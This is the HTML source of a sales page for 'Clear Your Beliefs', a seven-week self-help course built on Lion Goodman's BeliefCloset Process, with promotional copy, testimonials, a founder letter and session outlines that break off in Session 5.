style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\r\n\r\n&nbsp;\r\n<h1>The Garden Of Your Mind</h1>\r\n<p style="text-align: left;"><span style="color: #800000;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> </span>When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.</p>\r\n<p style="text-align: left;">The same thing is true in your subconscious mind:</p>\r\n<span style="color: #333399;"><strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong></span>\r\n<p style="text-align: left;"><strong>It''s that simple.</strong></p>\r\n&nbsp;\r\n<h1>Beliefs Reside In The Subconscious Mind</h1>\r\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\r\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\r\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\r\n\r\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\r\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\r\n\r\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\r\n\r\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\r\n\r\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	